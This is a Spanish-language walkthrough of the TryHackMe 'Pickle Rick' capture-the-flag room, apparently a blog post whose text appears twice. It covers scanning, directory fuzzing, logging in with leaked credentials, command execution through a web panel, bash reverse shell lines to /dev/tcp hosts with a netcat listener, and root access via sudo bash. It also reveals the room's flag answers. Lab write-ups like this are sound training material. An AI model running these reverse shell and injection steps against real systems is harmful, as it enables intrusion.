Pickle Rick | TryHackMe | Spanish
Luego de conectarse a la máquina y ver que efectivamente tenemos conexión con aquello, hacemos un escaneo con Nmap nmap -Pn -n --open --top-ports 10000 -T5 -sVC [IP obejetivo]. Podemos ver que hay levantado un Apache en el puerto 80, por lo cual ponemos la [IP objetiva] en el navegador y nos lleva a la siguiente página. Al abrir el código fuente y revisarlo, nos encontramos con el siguiente Username R1ckRul3s. Hacemos Fuzzing de la IP objetiva con gobuster dir -u [IP objetivo] -w [Ruta_diccionario] -x php,html,txt el cual nos suelta los siguientes directorios con status 200: /index.php /login.php /assests /porta.php /robots.txt Observamos que hay un txt así que procedemos a verlo. Vemos que nos dice Wubbalubbadubdub, lo guardaremos para después. Luego entramos al /login.php el cual nos pide user y passwd, el user ya lo tenemos R1ckRul3s, dado en el codigo fuente, con la palabra anterior que encontramos, en robots.txt, la introducimos en el password y... En efecto, entramos. Hay un panel que nos da cabida a introducir comandos, ¿Pero de cuáles? Primero veremos si se puede introducir scripts XSS... se intentó varios, pero no resulto, ahora veremos si los comandos de Linux son efectivos. Tal parece que si lo son, ya que con ls nos lista el contenido. Vemos quienes somos con id. Somos www-data y nos confirma que no tenemos ningún privilegio root. Al introducir el comando cat nos da un mensaje de que está deshabilitado, por lo tanto, usaremos uno similar less y abriremos Sup3rS3cretPickl3Ingred.txt. El archivo contiene mr. meeseek hair, puede ser la primera flag... Al introducirlo en la primera preguntan, en efecto, es la respuesta. clue.txt nos dice que busquemos en los demás directorios. robots.txt contiene la passwd que encontramos antes. El comando ls / nos lleva al directorio raíz e intentamos abrir el archivo /root, pero nos dice que no tenemos permiso. Vamos a hacer una Shell reverse para poder tener mejor visibilidad, buscamos Aquí vemos un bash TCP bash -i >& /dev/tcp/10.0.0.1/4242 0>&1 en Reverse Shell. Procedemos a modificarla para que funcione con nuestra interfaz, cambiamos la [IP] que trae por la nuestra que es la de OpenVPN. Entonces sería: bash -c 'bash -i >& /dev/tcp/10.2.46.4/1337 0>&1' en nuestro caso, solo cambiando la [IP] y el [Puerto] para escuchar luego con nc -lnvp 1337. Ponemos el comando bash -c 'bash -i >& /dev/tcp/10.2.46.4/1337 0>&1' en la página y... Entramos. Entramos al directorio /home/rick y vemos que hay un archivo llamado second ingredients, lo abrimos con cat 'second ingredients' y nos da 1 jerry tear. luego vamos a las questions a confirmar. Para el siguiente ingrediente debemos escalar privilegios, ya que el directorio /root nos manda un aviso de permiso denegado. Así que usamos sudo -l para inspeccionar. Y en este caso podemos usar sudo bash para elevarnos como usuario Root, confirmamos con id. Entramos al directorio /root. Vemos 3rd.txt el cual abrimos con cat 3rd.txt que nos da el tercer ingrediente fleeb juice. Lo confirmamos en las questions. Y así completamos la máquina Pickle Rick en TryHackMe.

Luego de conectarse a la máquina y ver que efectivamente tenemos conexión con aquello, hacemos un escaneo con Nmap nmap -Pn -n --open --top-ports 10000 -T5 -sVC [IP obejetivo]
.
Podemos ver que hay levantado un Apache en el puerto 80, por lo cual ponemos la [IP objetiva] en el navegador y nos lleva a la siguiente página.
Al abrir el código fuente y revisarlo, nos encontramos con el siguiente Username R1ckRul3s
.
Hacemos Fuzzing de la IP objetiva con gobuster dir -u [IP objetivo] -w [Ruta_diccionario] -x php,html,txt
el cual nos suelta los siguientes directorios con status 200
:
- /index.php
- /login.php
- /assests
- /porta.php
- /robots.txt
Observamos que hay un txt
así que procedemos a verlo.
Vemos que nos dice Wubbalubbadubdub
, lo guardaremos para después. Luego entramos al /login.php
el cual nos pide user
y passwd
, el user ya lo tenemos R1ckRul3s
, dado en el codigo fuente
, con la palabra anterior que encontramos, en robots.txt
, la introducimos en el password y... En efecto, entramos.
Hay un panel que nos da cabida a introducir comandos, ¿Pero de cuáles? Primero veremos si se puede introducir scripts XSS
... se intentó varios, pero no resulto, ahora veremos si los comandos de Linux son efectivos.
Tal parece que si lo son, ya que con ls
nos lista el contenido. Vemos quienes somos con id
.
Somos www-data
y nos confirma que no tenemos ningún privilegio root.
Al introducir el comando cat
nos da un mensaje de que está deshabilitado, por lo tanto, usaremos uno similar less
y abriremos Sup3rS3cretPickl3Ingred.txt
.
El archivo contiene mr. meeseek hair
, puede ser la primera flag... Al introducirlo en la primera preguntan, en efecto, es la respuesta.
-
clue.txt
nos dice que busquemos en los demás directorios. -
robots.txt
contiene la passwd que encontramos antes.
El comando ls /
nos lleva al directorio raíz e intentamos abrir el archivo /root
, pero nos dice que no tenemos permiso.
Vamos a hacer una Shell reverse para poder tener mejor visibilidad, buscamos Aquí vemos un bash TCP
bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
en Reverse Shell.
Procedemos a modificarla para que funcione con nuestra interfaz, cambiamos la [IP] que trae por la nuestra que es la de OpenVPN.
Entonces sería:
bash -c 'bash -i >& /dev/tcp/10.2.46.4/1337 0>&1'
en nuestro caso, solo cambiando la [IP] y el [Puerto] para escuchar luego con nc -lnvp 1337
.
Ponemos el comando bash -c 'bash -i >& /dev/tcp/10.2.46.4/1337 0>&1'
en la página y... Entramos.
Entramos al directorio /home/rick
y vemos que hay un archivo llamado second ingredients
, lo abrimos con cat 'second ingredients'
y nos da 1 jerry tear
.
luego vamos a las questions a confirmar.
Para el siguiente ingrediente debemos escalar privilegios, ya que el directorio /root
nos manda un aviso de permiso denegado
.
Así que usamos sudo -l
para inspeccionar.
Y en este caso podemos usar sudo bash
para elevarnos como usuario Root, confirmamos con id
.
Entramos al directorio /root
.
Vemos 3rd.txt
el cual abrimos con cat 3rd.txt
que nos da el tercer ingrediente fleeb juice
.
Lo confirmamos en las questions.
Y así completamos la máquina Pickle Rick en TryHackMe.